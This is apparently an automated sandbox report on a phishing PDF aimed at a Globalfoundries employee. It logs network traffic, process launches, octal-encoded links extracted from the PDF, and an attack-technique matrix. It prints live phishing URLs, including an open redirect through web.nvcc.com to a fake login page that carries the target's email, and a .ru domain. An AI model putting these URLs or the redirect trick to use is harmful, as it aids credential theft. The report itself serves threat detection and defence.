    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cc915a7fc91c407&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/222733666:1727915423:5-v15oC4VIYDeSwiN5Q89PsCmAt4Sv9Px2N-w3JWz38/8cc915a7fc91c407/a2be53c464a6597 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8cc915a7fc91c407/1727918165136/fe0f65985a4087ca86d273a2bf66cec51684f85e32960c17d0e1dc96ecaa931b/uGLBjHaOpVOp1J0 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cc915a7fc91c407/1727918165138/3p8fPrR4fQOFciC HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8cc915a7fc91c407/1727918165138/3p8fPrR4fQOFciC HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/222733666:1727915423:5-v15oC4VIYDeSwiN5Q89PsCmAt4Sv9Px2N-w3JWz38/8cc915a7fc91c407/a2be53c464a6597 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: x1.i.lencr.org
    Source: global trafficDNS traffic detected: DNS query: web.nvcc.com
    Source: global trafficDNS traffic detected: DNS query: dctools.mooo.com
    Source: global trafficDNS traffic detected: DNS query: ge6j.sisbousim.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1195242463:1727915362:58hzP5tn3icoVJf6EYrrU2uDT5trH6Au5dft6Khkcu4/8cc91295984a41f3/d43438995eb8455 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 2768sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: d43438995eb8455sec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 01:13:58 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zZQRG60xCy9TgbQXucSIhcQcAohfQ9Pu%2BGzMBLuQAabo2K51xMlF8RFgASW9uj1KDW3jib2RN9D99FkMwEczc%2FoNzWjnztIXtWV61%2Bf%2FvW%2FPUuKekvyimmtui%2FSz%2FQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-EncodingSpeculation-Rules: "/cdn-cgi/speculation"CF-Cache-Status: HITAge: 6066Server: cloudflareCF-RAY: 8cc9129d0f0443a5-EWR
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 01:14:00 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: ACqdBSiHGNZNhpo/g5yQ9SfyU9hgwIzIZ38=$8Bk2+uJre0r+HVayServer: cloudflareCF-RAY: 8cc912a6bda74363-EWR
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 01:14:03 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: pVZSX2bsHuAqCb7Rvafvvbg5LL8GF26UAXw=$CjRseJobGfiMXq5tcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8cc912ba1dafc3ff-EWR
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 01:16:06 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: uijAihZTOxgxEryTAx6n4xLjJ9rQ9AgMCdw=$x7s8tBQoudpjsTE4Server: cloudflareCF-RAY: 8cc915bb8b09191e-EWR
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 01:16:10 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: bl0ka6NQ98LE8F5FmYWJ53MN3J4r/cYvXZ4=$klnpSkbsmJFgeRdfServer: cloudflareCF-RAY: 8cc915d50fcc426b-EWR
    Source: 77EC63BDA74BD0D0E0426DC8F80085060.1.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
    Source: 2D85F72862B55C4EADD9E66E06947F3D0.1.drString found in binary or memory: http://x1.i.lencr.org/
    Source: chromecache_207.10.drString found in binary or memory: https://Ge6j.sisbousim.ru/jREPXBM/
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49738 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49739 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49742 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49793 version: TLS 1.2

    System Summary

    barindex
    Source: Globalfoundries.com_Report_46279.pdfStatic PDF information: Image stream: 8
    Source: Globalfoundries.com_Report_46279.pdfStatic PDF information: Image stream: 10
    Source: classification engineClassification label: mal56.phis.winPDF@42/64@31/12
    Source: Globalfoundries.com_Report_46279.pdfInitial sample: mailto\072teng\100unipharmnz\056co\056nz
    Source: Globalfoundries.com_Report_46279.pdfInitial sample: http\072\057\057www\056unipharmnz\056co\056nz\057
    Source: Globalfoundries.com_Report_46279.pdfInitial sample: \040\150\164\164\160\163\072\057\057\167\145\142\056\156\166\143\143\056\143\157\155\057\143\167\164\057\145\170\164\145\162\156\141\154\057\167\143\160\141\147\145\163\057\162\145\146\145\162\162\141\154\056\141\163\160\170\077\122\145\146\145\162\162\141\154\124\171\160\145\075\127\046\120\162\157\146\151\154\145\111\104\075\066\071\070\067\046\114\151\163\164\151\156\147\111\104\075\067\064\066\071\046\103\141\164\145\147\157\162\171\111\104\075\066\063\067\046\123\165\142\103\141\164\145\147\157\162\171\111\104\075\060\046\165\162\154\075\057\057\144\143\164\157\157\154\163\056\155\157\157\157\056\143\157\155\057\163\155\151\154\145\171\145\163\057\154\157\147\151\156\057\161\167\145\162\164\171\057\154\141\156\143\145\056\153\157\171\141\156\141\147\151\100\147\154\157\142\141\154\146\157\165\156\144\162\151\145\163\056\143\157\155\040\000
    Source: Globalfoundries.com_Report_46279.pdfInitial sample: \040\150\164\164\160\163\072\057\057\167\167\167\056\142\156\172\056\143\157\056\156\172\057\144\151\163\143\154\141\151\155\145\162\163\040\000
    Source: Globalfoundries.com_Report_46279.pdfInitial sample: mailto\072mark\137bullers\100bnz\056co\056nz
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents-journalJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-10-02 21-13-27-322.logJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
    Source: unknownProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Globalfoundries.com_Report_46279.pdf"
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1736,i,15902866623834626839,14244420450878097098,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://web.nvcc.com/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=6987&ListingID=7469&CategoryID=637&SubCategoryID=0&url=//dctools.mooo.com/smileyes/login/qwerty/lance.koyanagi@globalfoundries.com
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1996,i,15611262537185855656,1255272024732511954,262144 /prefetch:8
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1736,i,15902866623834626839,14244420450878097098,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1996,i,15611262537185855656,1255272024732511954,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Globalfoundries.com_Report_46279.pdfInitial sample: PDF keyword /JS count = 0
    Source: Globalfoundries.com_Report_46279.pdfInitial sample: PDF keyword /JavaScript count = 0
    Source: Globalfoundries.com_Report_46279.pdfInitial sample: PDF keyword /EmbeddedFile count = 0
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire Infrastructure1
    Spearphishing Link
    Windows Management InstrumentationPath Interception1
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    System Information Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    Globalfoundries.com_Report_46279.pdf2%VirustotalBrowse
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    neponsetvalleymacoc.weblinkconnect.com0%VirustotalBrowse
    a.nel.cloudflare.com0%VirustotalBrowse
    code.jquery.com1%VirustotalBrowse
    cdnjs.cloudflare.com0%VirustotalBrowse
    dctools.mooo.com1%VirustotalBrowse
    challenges.cloudflare.com0%VirustotalBrowse
    www.google.com0%VirustotalBrowse
    ge6j.sisbousim.ru0%VirustotalBrowse
    windowsupdatebg.s.llnwi.net1%VirustotalBrowse
    web.nvcc.com0%VirustotalBrowse
    x1.i.lencr.org0%VirustotalBrowse
    SourceDetectionScannerLabelLink
    http://x1.i.lencr.org/0%URL Reputationsafe
    http://x1.i.lencr.org/0%URL Reputationsafe
    https://code.jquery.com/jquery-3.6.0.min.js0%URL Reputationsafe
    https://code.jquery.com/jquery-3.6.0.min.js0%URL Reputationsafe
    https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js0%URL Reputationsafe
    https://challenges.cloudflare.com/turnstile/v0/g/ec4b873d446c/api.js0%VirustotalBrowse
    https://ge6j.sisbousim.ru/jREPXBM/0%VirustotalBrowse
